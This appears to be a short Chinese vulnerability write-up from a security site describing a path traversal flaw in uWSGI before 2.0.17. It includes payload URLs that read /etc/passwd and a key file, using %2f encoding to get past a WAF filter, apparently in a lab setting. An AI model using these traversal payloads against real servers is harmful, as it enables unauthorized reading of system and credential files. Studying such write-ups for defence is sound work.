标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2020-2629]   作者: 闲云野鸡 发表于: [2020-04-03]

本文共 [36] 位读者顶过

背景介绍
uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。
[出自:jiwo.org]
uWSGI 2.0.17之前版本中存在路径遍历漏洞,使用../可返回上级目录,由于/被过滤,使用%2f绕过

uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。 uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘..’序列的特制URL请求利用该漏洞查看系统上的任意文件。
payload:
先尝试    ../../……../etc/passwd读取文件 
发现被waf   换..%2f..%2f..%2f..%2f.......%2fetc%2fpasswd      确认漏洞存在
http://ip/..%2f..%2f..%2f..%2f..%2fkey.txt  最后读取key

评论

暂无
发表评论
 返回顶部 
热度(36)
 关注微信